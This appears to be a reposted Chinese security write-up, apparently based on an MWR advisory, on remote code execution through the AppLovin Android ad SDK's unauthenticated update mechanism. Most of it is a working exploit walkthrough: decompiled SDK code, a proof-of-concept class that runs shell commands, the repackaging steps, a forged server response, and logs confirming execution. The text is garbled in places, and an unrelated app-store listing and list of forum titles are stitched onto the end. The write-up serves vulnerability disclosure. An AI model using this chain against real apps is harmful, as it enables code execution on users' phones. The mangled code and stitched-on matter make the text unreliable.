CheckSum = SdkBoostrapTasksImpl.a(ResponseStream, SdkUpdateFile);
if(CheckSum != null && (CheckSum.equals(SdkImpCheckSum))) {
SharedPreferences$Editor v3_2 = BootstrapSettings.edit();
v3_2.putString("version", SDKFileName);
v3_2.putString("interface", "5.0.0");
v3_2.putString("ServerEventId", AppLovinEventID);
v3_2.putString("ServerChecksum", CheckSum);
SdkBoostrapTasksImpl.a(this.a, "New update processed: " + SDKFileName);
goto label_130;
SdkBoostrapTasksImpl.a(this.a, "SDK update checksum does not match. Expected " +
SdkImpCheckSum + ", but got " + CheckSum);
goto label_130;
SdkBoostrapTasksImpl.a(this.a, "Unable to receive SDK update: " + uri + " has not returend a file name");
上述代码从"applovin.sdk.boostrap"配置文件中读取一个版本号作为checksum,然后构造和发送以下请求:
1 GET /sdk/android?interface=5.0.0&implementation=5.0.3 HTTP/1.1
2 User-Agent: Dalvik/1.6.0 (L U; Android 4.3; sdk Build/JWR66V)
4 Connection: Keep-Alive
5 Accept-Encoding: gzip
然后对接收到的以下服务器响应信息进行处理:
1 HTTP/1.1 200
3 Server: nginx
5 Date: Mon, 21 Oct :20 GMT
7 Content-Type: text/html
9 Connection: keep-alive
11 Vary: Accept-Encoding
13 Cache-Control: no-store, no-cache, must-revalidate
15 AppLovin-Sdk-Update-Interval: 10
17 AppLovin-Sdk-Next-Update-Time: 10
19 AppLovin-Sdk-Implementation: 5.0.3.jar
21 AppLovin-Sdk-Implementation-Checksum: a9e5f7c98ab3f1dc9ecab25f15ef09e25d5bce28
23 AppLovin-Event-ID: 123456
25 Content-Length: 1660
服务器会返回以上的响应信息,这些数据被写入到一个文件(文件名为AppLovin-Sdk-Implementation头的值,实际为一个jar包)中,同时会产生一个SHA1
哈希值与AppLovin-Sdk-Implementation-Checksum头的值进行匹配。响应头中其它信息如&AppLovin-Sdk-Update-Interval头&和&AppLovin-Sdk-Next-Update-Time头被写入到一个配置文件中以控制下次应用的更新时间间隔。
当应用再次启动时bootstrap进程初始化的流程就不同了。这个时候com.applovin.sdk.bootstrap包中的SdkBootstrap&类会从配置文件中读取这些值,如果发现这些值不匹配则不会通过控制器去启动更新机制。否则就去检查app_al_sdk目录下是否存在jar文件并与配置文件中的版本值相匹配,匹配则将jar包中的classess.dex文件解压到app_al_outdex文件夹中。
1 package com.applovin.sdk.
7 public class SdkBootstrap {
13 private void BootstrapSdkClassLoaderInit(Context AppContext) {
this.VerboseLogging = AppLovinSdkUtils.isVerboseLoggingEnabled(AppContext);
SharedPreferences bootstrapPref = AppContext.getSharedPreferences("applovin.sdk.boostrap", 0
String versionVal = bootstrapPref.getString("version", "");
String interfaceVal = bootstrapPref.getString("interface", "");
if(versionVal.length() &= 0 || !"5.0.0".equals(interfaceVal)) {
this.disable();
File FileNameParam1 = new File(AppContext.getDir("al_sdk", 0), versionVal);
if((FileNameParam1.exists()) && FileNameParam1.length() & 0) {
this.ThisClassLoader = new SdkClassLoader(FileNameParam1, AppContext.getDir("al_outdex"
, 0), SdkBootstrap.class.getClassLoader());
goto checkForU
this.Log_("SDK implementation file " + versionVal + " has no content, using default implementation"
this.disable();
在com.applovin.sdk.bootstrap.SdkClassLoader类中SdkClassLoader&方法被调用:
1 package com.applovin.sdk.
7 public class SdkClassLoader extends DexClassLoader {
public SdkClassLoader(File FileNameParam, File DirectoryNameParam, ClassLoader ClassLoaderObject
super(FileNameParam.getAbsolutePath(), DirectoryNameParam.getAbsolutePath(), null, ClassLoaderObject
类加载器对象加载classes.dex,并作为参数从checkForUpdates方法中传递到loadImplementation方法中:
1 package com.applovin.sdk.
7 public class SdkBootstrap {
public void checkForUpdates()
if (AppLovinSdkUtils.isAutoUpdateEnabled(this.d))
SdkBoostrapTasks localSdkBoostrapTasks = (SdkBoostrapTasks)loadImplementation(SdkBoostrapTasks.class);
if (localSdkBoostrapTasks != null)
localSdkBoostrapTasks.startUpdateDownload(this.d.getApplicationContext());
loadImplementation 方法如下:
1 package com.applovin.impl.
7 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
String str1 = paramClass.getSimpleName();
String str2 = paramClass.getPackage().getName();
String str3 = str2.substring(1 + str2.lastIndexOf('.'));
String str4 = "com.applovin.impl." + str3 + "." + str1 + "Impl";
a("Loading " + str4 + "...");
Object localObject = paramClass.cast(this.e.loadClass(str4).newInstance());
return localO
这个方法从提供的classes.dex文件中加载com.applovin.impl.bootstrap.SdkBoostrapTasksImpl类并且返回一个对象(即localSdkBoostrapTasks)给checkForUpdates方法,checkForUpdates方法再通过返回的这个对象调用startUpdateDownload方法。
1 public void checkForUpdates()
if (AppLovinSdkUtils.isAutoUpdateEnabled(this.d))
SdkBoostrapTasks localSdkBoostrapTasks = (SdkBoostrapTasks)loadImplementation(SdkBoostrapTasks.class);
if (localSdkBoostrapTasks != null)
localSdkBoostrapTasks.startUpdateDownload(this.d.getApplicationContext());
SdkBoostrapTasksImpl&类中startUpdateDownload&方法原型如下:
1 package com.applovin.impl.
7 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
public void startUpdateDownload(Context paramContext)
this.a = AppLovinSdkUtils.isVerboseLoggingEnabled(paramContext);
SharedPreferences localSharedPreferences = paramContext.getSharedPreferences("applovin.sdk.boostrap", 0);
long l1 = System.currentTimeMillis();
long l2 = localSharedPreferences.getLong("NextAutoupdateTime", 0L);
if ((l2 == 0L) || (l1 & l2))
new b(this, paramContext).start();
攻击者可以通过 重新实现
com.applovin.impl.bootstrap.SdkBoostrapTasksImpl
类中的startUpdateDownload&
方法 构造一个恶意的sdk更新。为了达到这个目的,需要对包含有漏洞的AppLovin
sdk应用进行反编译。
$ unzip VulnerableApp.apk
利用dex2jar将解压后得到的classes.dex文件反编译成jar包:
$ dex2jar.sh classes.dex
创建一个eclipse工程,将工程Properties设置为“Is
Library”(在工程右击-properties-Android最下面,有个Is
library,选择后-apply确定,表示此工程可以公开给别的工程使用),然后将上一步得到的classes_dex2jar.jar文件复制到lib目录下。
$ cp classes-dex2jar.jar ~/eclipse-workspace/MWRAppLovin/libs/
接下来创建com.applovin.impl.bootstrap包和SdkBoostrapTasksImpl类,PoC如下:
1 package com.applovin.impl.
3 import java.io.BufferedW
5 import java.io.IOE
7 import java.io.OutputStreamW
9 import android.content.C
11 import android.os.E
13 import android.util.L
15 import com.applovin.sdk.bootstrap.SdkBoostrapT
17 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
public SdkBoostrapTasksImpl() {
public void startUpdateDownload(Context AppContextParam) {
AppContextParam.getApplicationContext();
Log.i("[mwr]", "startUpdateDownload — running our injected code");
String path = Environment.getExternalStorageDirectory().getPath();
String[] commands = {
"echo -e "--[mwr]--" & " + path + "/mwr.txt\n",
"id && " + path + "/mwr.txt\n"
execCommands(commands);
public Boolean execCommands(String... command) {
Runtime rtime = Runtime.getRuntime();
Process child = null;
child = rtime.exec("/system/bin/sh");
} catch (IOException e1) {
BufferedWriter outCommand = new BufferedWriter(new OutputStreamWriter(child.getOutputStream()));
for(int i = 0; i & command. i++) {
Log.i("[mwr]", "execCommands — executing " + command[i]);
outCommand.write(command[i]);
outCommand.flush();
} catch (IOException e) {
return true;
上面的PoC会将当前用户id写入sd卡的mwr.txt文件中。如果这个lib库已经被编译成jar包,则必须用dx将其重打包为dex。
$ dx --dex --output=mwr_applovin_sdk.jar mwrapplovin.jar
(注:dx --dex --output=target.jar origin.jar&
首先将origin.jar编译成origin.dex文件(Android虚拟机认识的字节码文件),然后再将origin.dex文件压缩成target.jar)
然后攻击者需要伪造服务器对客户端更新请求的响应并且发送恶意sdk更新,同时需要生成恶意jar包的checksum(sha1哈希):
$ shasum mwr_applovin_sdk.jar
860ba30a89874df5c26a6fadfb92
一个伪造的响应如下所示:
1 HTTP/1.1 200
3 Server: nginx
5 Date: Mon, 21 Oct :20 GMT
7 Content-Type: text/html
9 Connection: keep-alive
11 Vary: Accept-Encoding
13 Cache-Control: no-store, no-cache, must-revalidate
15 AppLovin-Sdk-Update-Interval: 1000
17 AppLovin-Sdk-Next-Update-Time: 1000
19 AppLovin-Sdk-Implementation: mwr_applovin_sdk.jar
21 AppLovin-Sdk-Implementation-Checksum: 860ba30a89874df5c26a6fadfb92
23 AppLovin-Event-ID: 123456
25 Content-Length: 1660
27 &&/span&BINARY DATA&
用logcat查看广告插件的日志信息,从相关event可知恶意jar文件已经被下载:
1 I/AppLovinSdk(
742): [Boostrap] Auto-update info: {code: 200, eventId: 123456, fileName: mwr_applovin_sdk.jar, checksum: 860ba30a89874df5c26a6fadfb92, interval: 10}
3 I/AppLovinSdk(
742): [Boostrap] New update processed: mwr_applovin_sdk.jar
5 I/AppLovinSdk(
742): [Boostrap] Next update is at: "3"
下述log信息表明当应用再次启动的时候,从jar包中释放出了dex文件并且恶意代码已经执行:
1 /dalvikvm( 3280): DexOpt: --- BEGIN 'mwr_applovin_sdk.jar' (bootstrap=0) ---
3 D/dalvikvm( 2949): GC_FOR_ALLOC freed 0K, 3% free 5K, paused 156ms, total 156ms
5 D/dalvikvm( 3398): DexOpt: load 41ms, verify+opt 15ms, 80116 bytes
7 D/dalvikvm( 3280): DexOpt: --- END 'mwr_applovin_sdk.jar' (success) ---
9 D/dalvikvm( 3280): DEX prep '/data/data/&&/span&vulnerable app&/app_al_sdk/mwr_applovin_sdk.jar': unzip in 0ms, rewrite 286ms
11 I/AppLovinSdk( 3280): [Boostrap] Loading com.applovin.impl.bootstrap.SdkBoostrapTasksImpl...
13 D/AppLovinSdk( 3280): Loading SDK implementation class: com.applovin.impl.bootstrap.SdkBoostrapTasksImpl
15 I/[mwr]
( 3280): startUpdateDownload — running our injected code
17 I/[mwr]
( 3280): execCommands — executing echo -e "--[mwr]--" && /mnt/sdcard/mwr.txt
19 I/[mwr]
( 3280): execCommands — executing id && /mnt/sdcard/mwr.txt
adb命令表明执行很成功:
1 $ adb shell
3 root@generic:/ # cat /mnt/sdcard/mwr.txt
5 --[mwr]--
7 uid=10048(u0_a48) gid=10048(u0_a48) groups=1006(camera),1015(sdcard_rw),1028(sdcard_r),3003(inet),50048(all_a48)
参考资料:
/article/2093460/mobile-users-at-risk-from-lack-of-https-use-by-mobile-ad-libraries-security-researchers-say.html
/blog/threat-research/2013/10/ad-vulna-a-vulnaggressive-vulnerable-aggressive-adware-threatening-millions.html
/blog//applovin-ad-library-sdk-remote-command-execution-via-update-mechanism/
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。魅族应用商店_魅族手机应用下载官方商店
Flyme 软件商店-音乐音ञQ
魅友评分:
类&&&&&&别:
开&发&者&:
版&&&&&&本:
下&&&&&&载:
大&&&&&&小:
更新时间:
系统版本:
Flyme OS通用
应用简介:
让你的Andr​​oid&的声音未有过。
*万安装在第一个月对谷歌d放。退房的原因。
音乐音‘均衡器是一个体声LED VU米和5波段均衡器,低音增强和虚b器效果与现场音乐的​​音‘滑块。
提高声音的质‘在你的Andr​​oid&备和现场音频您当前的音乐的音‘电平数。
使用耳机,最好的结果。
产品特点:
*媒体音‘控制*五波段均衡器*‘低音效果*虚b器效果* 9均衡器缺省*存定义缺省*体声LED VU表*主页屏幕小部件*锁定媒体的音‘
兼容于大多数音乐d放器,如:
*的Andr​​oid&音乐d放器* Winamp的*谷歌音乐* MixZing*后级多
安装和使用:
*长按主屏幕上加音乐音‘均衡器部件。*将耳机*打开音乐d放器和d放您的音乐*按音乐音‘均衡器部件和调节音‘和频率。*要存定义的缺省按存缺省列表和类型的缺省名称。若要删除缺省的,长按缺省的名称和删除。状态栏长按应用程的电源按”关•应用程并删除。
我的数据共与服务提供商,AppLovin公司。使用您的数据AppLovin到AppLovin的隐私政策和使用条款。这两项政策是在
我留权利,以的匿名踪和报告此应用程的用户的活动内。
************************************************** *********
AppEggs评:&您使用您的Andr​​oid&手机作为主要的音乐聆听备,音乐音‘均衡器S以是最好的Andr​​oid&应用程,以提高你的音乐聆听体验到现在。音乐音‘均衡器S以提高声音的质‘,在你的Andr​​oid&备和现场数 - 您当前的音乐的音‘水平。&http:///apps/hr.podlanica,21370.html
评:
兰e*****&工程就P一个魅力!阅的兼容性V表和评后,我决定采取的˜跃,并尝试安装在我的三星Galaxy S II 4G的史诗触摸,不仅完美的作品,它的一切表示将。使用Winamp和完全否定了这个应用程需要&走亲&。它也适用于何其他我的手机上安装的媒体d放器(MX,潘多拉等)的。&必须有&的谁爱用己的智€手机应用程作为其主要的媒体d放备,在家‘还是在旅途中。这个程ROCKS!&
Asitha *****&最伟大的应用程的Andr​​oid&超‘低音。酷A + + + + + +。10/10&
李*****必须有应用程近乎完美的音乐!
贾德*****&S要最好的,我想尽式的应用程S以在市场上,我会说这是最好的,我什至感到满意,所有的玩家于10波段均衡器,唯一的缺点是听完之后,你的音乐,它会动关•。除此之外,它是伟大的!&
请随时向我发送您的意见。* Android是谷歌公司的商标。
版本描述:
- 材料计主题 - 支持安&#x
应用截图:}
我要回帖
更多关于 applovin sdk 的文章
更多推荐
- ·大家好,请问大家,这个做好的文件把红色印章放上去是什么字啊?
- ·中国式现代化的五大特点特征是什么?
- ·在舞龙一般几个人舞狮活动中,100人接龙成功,家族领袖和族长可获得什么称号?
- ·在舞龙一般几个人舞狮活动中,50人接龙成功,家族领袖和族长可获得什么称号?
- ·2024年古尔邦节是几月几日哪个民族的节
- ·可以给一个换装demo演示吗
- ·月刊的cssci扩展版期刊哪些收硕士生文章
- ·不忱感谢之至
- ·为什么我把你删除了,你知道可还是不把删除呢?为什么
- ·电磁波加载在高频电流上的原理
- ·我有个小朋友感冒会头痛吗太烦人了 我想整整他 给我个锁机软件 我让他头痛一会 要带密码的
- ·lte路测软件有哪些
- ·文档中如何保证表格每一行同高
- ·谁有玛格丽特的《羚羊与秧鸡》txt格式?
- ·is语音软件都有哪些房间是刷单专用的呢?
- ·有时候扫二维码怎么出现uuid错误
- ·怎么将iphone6s输入法设置成篆体文字
- ·求高跟鞋先生资源高清版,免费的。谢谢了
- ·求跟下面头像是一对的qq闺蜜头像的头像
- ·求伪恋第一季百度云高清无删节版百度云
- ·怎么删除com.applovinn 上的应用
- ·飘飘欲仙txt下载网盘全集下载
- ·屏型号lc460f10-e1-i什么屏
- ·华为mt7tl00外屏碎了,换下要多少钱?
- ·三星M2021激光打印机更换墨盒无法识别,显示墨盒不兼容,我该怎么处理
- ·戴尔灵越5557,win10,有时候玩lol几个小时后,大约一个小时没大去碰,然后点击关机后屏幕熄
- ·女子刷旧手机得60万
- ·方正e7电子狗是干什么用的怎么样
- ·大家好!请问我用全民k歌和唱吧录音为什么不用耳机就听不见录音?该如何调整?盼解答!
- ·求大神指导,vivo机,怎么获取Root权限,安卓系统是5.0,系统是1.94版本。用的好多软件都
- ·求助关于紧束缚计算过程中slater-koster参数拟合的办法
- ·Apple Watch怎么按喜好排列主屏应用图标
- ·刚买的红米手机开关机按键一边能按下去一边按不下去,这是不是手机做工尺寸有问题
- ·盈通GTX950-2GD5 游戏高手TOP怎么样
- ·三星g9198外屏闪烁是什么问题
